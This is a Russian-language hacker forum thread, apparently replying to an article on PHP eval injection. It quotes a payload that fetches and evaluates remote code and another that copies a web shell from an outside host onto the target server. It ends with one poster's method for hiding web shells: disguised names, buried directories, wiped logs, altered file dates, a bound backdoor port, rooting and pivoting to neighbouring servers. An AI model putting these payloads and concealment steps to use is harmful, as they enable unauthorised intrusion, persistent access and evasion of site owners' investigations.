"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?

Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr(); И без физ.загрузки это уже не "шелл на сервере", да и зачем такая сложная форма загрузки на сервер? в моей статье всё расписано, как проще сделать.


P.S И вообще, дорогие РОА, МОА, сами посмотрите, что кроме вас, которые это уже знают, есть очень много людей, которым это нужно.

Osstudio, а разница?)

Смотря в чём

::facepalm::

Открой для себя функции php. Начни со stripslashes().

Да фиг с ними с функциями, тайна: данные с реквеста php и так принимает строковыми, а если бы он делал по другому случилось бы страшное безобразие, поверь мне. (только никому!!)

Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )

а смысл??? Они же все знают и ток писать что это паблик инфа могут, тс это писал для тех кто плохо в этом шарит и кому это будет нужно, а им как раз это вроде как и нах не надо

Ну а так в целом я думаю тс шарит нормально и он думаю был бы не против

Согласен, тип string можно к примеру сделать так $a = (bla); , но ведь нельзя тогда использовать пробелы, спец.символы. что касается stripslashes() то какая разница, если пхп тупо выдаёт ошибку, если даже \' ??

А насчёт ::facepalm::, eval(eval) - на мой взгляд полный бред

ev=copy($_REQUEST[aa], $_REQUEST[bb]);&aa=http://site.ru/shell.php&bb=./shell.php

А это тебе домашнее задание )

ТС, скажи мне лучше как ты прячешь шеллы на сервере. Мне не для того, чтобы узнать, а просто интересно, что ты знаешь в данной области.

1.) Беспалевное имя

2.) Запрячу в самом дальнем каталоге, где много фалов.

3.) Почищу логи

4.) Изменю дату создания файла

5.) Заодно делаю бинд порт, если удалят, он часто остаётся.

6.) Да и много ещё чего придумать можно. Также сначала рутаю, затем кидаю на соседние сервера, чтобы потом с них пробиться можно было, на соседах также выполняю пункты выше.

P.S А ты?